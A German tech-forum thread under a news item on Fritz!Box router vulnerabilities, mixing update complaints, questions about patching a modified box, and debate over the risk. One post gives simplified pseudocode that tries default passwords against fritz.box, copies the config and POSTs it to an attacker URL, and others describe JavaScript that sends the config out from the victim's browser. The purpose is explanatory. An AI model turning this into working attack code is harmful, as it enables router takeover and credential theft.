ComputerBase Menü
Aktuelles

News Angriffe auf Fritz!Box-Router ohne Fernzugriff möglich

-> ich hab das Update vor einiger Zeit installiert

-> hatte nach dem Update massive Probleme bei DECT (7390) -> wenn eine eingehende Nummer auf mehreren Telefonen klingeln soll, dann kam der Anruf nicht an. Abgehend war möglich

-> musste die Telefone und Nummer neu zuweisen, Die Settings durchwürfeln, dann gings wieder.

-> desweiteren arbeitete mein Wifi nach dem Update trotz "Autochannel" Genau auf dem Kanal des Nachbars -> hatte mich über ständige Abbrüche gewundert. -> Manuell geswitched und dann wieder auf "Auto"
 
Würde mich freuen, wenn hier auch jemand ne gefritzte FRITZ!Box Fon WLAN 7270 v2 Speedport W920V betreibt und was über einen Patch weiss. Kenne mich da leider nicht so gut aus ;(
 
X_Clamp schrieb:
Würde mich freuen, wenn hier auch jemand ne gefritzte FRITZ!Box Fon WLAN 7270 v2 Speedport W920V betreibt und was über einen Patch weiss. Kenne mich da leider nicht so gut aus ;(
Zum Vergrößern anklicken....

Wenn du dich nicht so aus kennst, wieso dann gefritzt ? Brauchst du IRGENDWAS von den Features? Falls nein: w921v. Und wenn du nicht mal ISDN brauchst dann nimm den w724v, der hat soagr WLAN AC ;)
 
dMopp schrieb:
Wenn du dich nicht so aus kennst, wieso dann gefritzt ? Brauchst du IRGENDWAS von den Features? Falls nein: w921v. Und wenn du nicht mal ISDN brauchst dann nimm den w724v, der hat soagr WLAN AC ;)
Zum Vergrößern anklicken....

Ich will nicht nen neuen Router, sondern meinen jetzigen auf den neuesten Softwarestand bringen. Den habe ich damals schon gefritzt gekauft und alleine schon die Autoreconnect Funktion mittels Software ist es Wert, den Router zu fritzen. Also bitte nicht nach dem Sinn fragen, sondern lieber helfen, wie man diesen Router mit dem aktuellen Patch versehen kann ...
 
also wie kritisch ist die lücke jetzt wirklich? ist realistisch betrachtet davon auszugehen, dass jemand ohne passwörter in null komma nix bei tante erna, die nur ab und zu mal lovefilm guckt und mails abruft, einbricht und ihr ne hohe telefonrechnung verpasst?

oder ist das nur bei leuten kritisch, die "123456" als passwort haben und täglich auf viren-baukit-seiten rumsurfen?
 
Viele Router sind OHNE Passwort (oder standard PW) käuflich erwerblich. Diese Router sind davon betroffen 8dank XSS sogar noch nach dem Patch, ja ein einfaches JS sich ohne Probleme einloggen kann).

Wie auch immer, betrifft mich zum Glück nicht :)
 
Naddel_81 schrieb:
also wie kritisch ist die lücke jetzt wirklich? ist realistisch betrachtet davon auszugehen, dass jemand ohne passwörter in null komma nix bei tante erna, die nur ab und zu mal lovefilm guckt und mails abruft, einbricht und ihr ne hohe telefonrechnung verpasst?

oder ist das nur bei leuten kritisch, die "123456" als passwort haben und täglich auf viren-baukit-seiten rumsurfen?
Zum Vergrößern anklicken....

Das Passwort ist egal, die gesamte Config wird an den Hacker geschickt, da steht das Passwort im Klartext :)
Es kann jedem passieren, auch auf seriösen Seiten.
 
Noch mal: Braucht man generell nicht.

Ich implementiere ein JS, dass sich von DEINEM RECHNER aus mit der FB verbindet, alle Daten an mich schickt und direkt noch den Port öffnet. Daten habe ich ja dann ;)
 
dMopp schrieb:
Helfen tun dagegen nur gute Passwörter
Zum Vergrößern anklicken....

Aber das Passwort für meine GUI kennen die Gauner doch, da die Fritzbox das ja bekannt gibt. Das betten sie dann im Javascript Code und schicken es an meinen Browser der das dann aus dem LAN ausführt.
 
Ich meinte ein Passwort für die GUI ;). Wenn das JS sich nicht in die FB einloggen kann (mangels PW) kann das JS nix weiter machen. Eine Ausnahme ist die aktuelle Sicherheitslücke die das offenbar aushebelt.
 
Nochmal, mit der aktuellen Sicherheitslücke braucht es kein Passwort um die Config der Box auf einen externen Server zu laden, dort steht alles drin was ein Hacker braucht, im Klartext.
 
So, ich versuche es in Länger:

Wichtig ist, dass man beim Einrichten seines Routers ein brauchbares Kennwort für das Webinterface ausdenkt (Keine einfaches Wörter, nicht die Mailadresse, nicht das Geburtsdatum etc...).

Gehen wir mal davon aus, es existiert ein JavaScript das folgendes macht: (ganz vereinfachter pseudocode)
Code: 
defaultPWs [ admin, login, ADMIN, sicher, sehrsicher, 1234, bla]
for passwort in defaultPWs; do
curl -h fritz.box/login.bla --password=$passwort > headerdata
done
copyConfig from fritz.box --use-header $headerdata > config
curl url-des-bösen --POST $config

Das schafft sogar nen kleiner ARM unter einer Sekunde (die Liste lässt sich ja erweitern wenn man will). Wichtig ist halt, dass das gewählte passwort sich nicht per einfacher Liste rausfinden lässt.


Im aktuellen Fall scheint es aber so zu sein, dass eine Lücke existiert, die es ermöglicht sogar die PW Abfrage zu umgehen.

Einzige Abhilfe: JS auf allen Geräten verbieten die hinterm Router hängen bis es gefixt ist. Wenn der Patch schon eingespielt ist, gilt das mit nem brauchbaren Passwort aber noch immer ;)
 
Zuletzt bearbeitet:
Nein, laut offizieller Aussage von Heise ist kein JS erforderlich, das geht auch ohne ;)

Also jeden Grund zu Sorge.
 
Du musst dich einloggen oder registrieren, um hier zu antworten.

Ähnliche Themen

Jan
News 20 Jahre Fritz!Box: AVMs Kassenschlager-Router feiert den 20. Geburtstag
7 8 9
Antworten
162
Aufrufe
12.829
MHumann
MHumann
Mondgesang
Realtek RTL8191SU USB-WLAN Stick verbindet nicht mit Fritz!Box 7560 AK (Home Server Speed)
Antworten
4
Aufrufe
460
Mondgesang
Mondgesang
P
Glasfaserwechsel mit FRITZ!Box Mesh und zweitem Router / Konfig und Vorgehen
Antworten
9
Aufrufe
1.429
norKoeri
N
SVΞN
News Vorschau auf Fritz!OS 7.50: Neue Labor-Firmware für DSL-, Kabel-, LTE- und 5G-Router
3 4 5
Antworten
93
Aufrufe
18.261
Goldie
G
SVΞN
News Vorschau auf AVM Fritz!OS 7.50: Nachschub aus dem Labor für Router und Repeater
3 4 5
Antworten
87
Aufrufe
21.777
Winxer
Winxer
Zurück
Oben

Willkommen auf ComputerBase!

Mit Werbung weiterlesen

Besuche ComputerBase wie gewohnt mit Werbung und Tracking. Die Zustimmung ist jederzeit widerrufbar.

Details im Privacy Center und in der Liste unserer Partner. Ein Widerruf ist möglich in der Datenschutzerklärung.

… oder ComputerBase Pro bestellen

Nutze ComputerBase ohne Werbebanner, Video-Ads und Werbetracking schon für 4 €/Monat oder 36 €/Jahr.

Mehr zu ComputerBase Pro

Bereits Pro-Nutzer? Hier anmelden.

Tracking: Wir und unsere 165 Partner verarbeiten personenbezogene Daten, indem wir mit auf Ihrem Gerät gespeicherten Informationen (z. B. eindeutige Kennungen in Cookies) ein Nutzungsprofil erstellen, um z. B. Anzeigen zu personalisieren. Verarbeitungszwecke: Genaue Standortdaten und Abfrage von Geräteeigenschaften zur Identifikation, Informationen auf einem Gerät speichern und/oder abrufen, Personalisierte Anzeigen und Inhalte, Anzeigen- und Inhaltsmessungen, Erkenntnisse über Zielgruppen und Produktentwicklungen.

Impressum Kontakt Datenschutz